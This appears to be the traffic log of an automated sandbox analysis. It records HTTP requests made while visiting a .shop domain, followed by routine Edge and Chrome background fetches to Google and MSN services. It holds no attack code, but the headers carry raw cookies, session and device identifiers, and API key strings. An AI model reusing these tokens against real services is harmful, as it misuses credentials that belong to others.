Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: tlfiyat.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlKHLAQic/swBCPqYzQEIhaDNAQjcvc0BCNrDzQEIj8rNAQi5ys0BCJ/RzQEI3NPNAQjR1s0BCPTWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlKHLAQic/swBCPqYzQEIhaDNAQjcvc0BCNrDzQEIj8rNAQi5ys0BCJ/RzQEI3NPNAQjR1s0BCPTWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.bb64361f77a4185b4ba3.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.c7d27109b98aa5c6a189.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.a8bc96a9c4710d87d862.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.f7b45d2c12f269c9e987.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.a3d5d471bc3c3cb17d2e.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=edgeChromium&v=20250123.293&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22edgeChromium%22,%22version%22:%22117%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22ntp.msn.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22os%22:%22windows%22,%22platform%22:%22web%22,%22pageType%22:%22dhp%22,%22pageExperiments%22:[%22prg-1s-dwvid-wpo%22,%22prg-1s-twid%22,%22prg-1s-workid%22,%22prg-1s-wxtrendv3%22,%22prg-1sw-aitt-ct%22,%22prg-1sw-artf1%22,%22prg-1sw-artrcnr%22,%22prg-1sw-bg-p2%22,%22prg-1sw-bmcon%22,%22prg-1sw-c-prefetchcrs%22,%22prg-1sw-cmevlt%22,%22prg-1sw-crypinf%22,%22prg-1sw-cryptren%22,%22prg-1sw-fc-ghads%22,%22prg-1sw-ldny-transit%22,%22prg-1sw-mtr-en%22,%22prg-1sw-nodenseifp%22,%22prg-1sw-reclaim%22,%22prg-1sw-reclaim2%22,%22prg-1sw-sa-shortintentt1%22,%22prg-1sw-sa-uienichev2t21%22,%22prg-1sw-sacfx2t2%22,%22prg-1sw-sagervunipb%22,%22prg-1sw-saphidei3c%22,%22prg-1sw-tbrfltr%22,%22prg-1sw-tran-trd%22,%22prg-1sw-tvid-p1%22,%22prg-1sw-tvid-t20%22,%22prg-1sw-userwid%22,%22prg-1sw-videopb%22,%22prg-1sw-videosxap%22,%22prg-1sw-wxnhcolk%22,%22prg-1sw-wxomghd%22,%22prg-ad-bdup-5%22,%22prg-ad-conf-ext%22,%22prg-ad-img-retry%22,%22prg-ad-pdedupeb%22,%22prg-adspeek%22,%22prg-cg-ab-testing%22,%22prg-cg-cfzhcnfx%22,%22prg-cg-ingames-ct%22,%22prg-cg-int-ad-pod%22,%22prg-cg-lstfix%22,%22prg-cg-pwa-lock%22,%22prg-cxtsc-c%22,%22prg-fin-compof%22,%22prg-fin-hpoflio%22,%22prg-fin-mwlc%22,%22prg-fin-p1duea%22,%22prg-fin-p2duea%22,%22prg-fin-poflio%22,%22prg-fin-rmar-ct%22,%22prg-gc-pickwinner%22,%22prg-msn-blsbidmho%22,%22prg-p1-txt2%22,%22prg-p1-uc3%22,%22prg-p2-tf-bdgpv-ai%22,%22prg-pr1-videos%22,%22prg-pr2-2cinfopane%22,%22prg-pr2-2clazyifp%22,%22prg-pr2-aisi%22,%22prg-pr2-aitt%22,%22prg-pr2-c-prespot%22,%22prg-pr2-fieplc%22,%22prg-pr2-lazyifpdma%22,%22prg-pr2-lazyippl0%22,%22prg-pr2-lifecycleba%22,%22prg-pr2-marketsel-c%22,%22prg-pr2-nobgifpnrot%22,%22prg-pr2-rail2colboard%22,%22prg-pr2-stalecontent%22,%22prg-pr2-stalecontent-dt%22,%22prg-pr2-tf-local-c1%22,%22prg-pr2-trf-rhighimp%22,%22prg-pr2-trfnblc%22,%22prg-pr2-uxmitipreimg%22,%22prg-pr2-wwidgets-t%22,%22prg-pr2-wxevolnoti%22,%22prg-pw-t-cct-migrate%22,%22prg-pw-t-no-ad-css%22,%22prg-sh-bd-video%22,%22prg-sh-dealsdaypdp%22,%22prg-sh-frnrc%22,%22prg-sh-rmitmlnk%22,%22prg-shipwidoff%22,%22prg-sp-liveapi%22,%22prg-stalewhp%22,%22prg-tv-api%22,%22prg-tv-segcap10%22,%22prg-upsaip-w1-t%22,%22prg-vid-cd%22,%22prg-vid-trdcache%22,%22prg-widgets-manager%22,%22prg-widgets-region%22,%22prg-wtch-chsb-c%22,%22prg-wx-dhgrd-c%22,%22prg-wx-nfor%22]} HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-feed-libs.5fd273d0fc8ef0378ad1.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/msn/user?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=3A35C6D9-C75F-44F1-A696-E1F20ED10EDD&ocid=pdp-peregrine&cm=en-us&it=app&user=m-36CB6A348F62672B3E3A7F498E00663A&scn=APP_ANON&source=market-consolidation HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-cscore.6e0711917552da24ba6f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/super-nav.e1d340c50396d2b009ae.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experiences_top-sites-edgenext-wc_dist_TopSitesEdgeNextWC_addDialog_js-experiences_top-sites--c06b42.8ee34ad56c99bb958dca.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.98cd32e4ed2776436d71.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1737661217428&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=3a35c6d9c75f44f1a696e1f20ed10edd&activityId=3a35c6d9c75f44f1a696e1f20ed10edd&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /b?rn=1737661217429&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=36CB6A348F62672B3E3A7F498E00663A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/brand/new-msn-logo-color-black.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons-wc/icons/FeedSettings.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A
Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 10sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79152d70-0c76-4bcf-bb6a-0dcbed0d61a3; ai_session=uD0SM9lVnN+ZBovzvvWf2A|1737661217424|1737661217424; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z
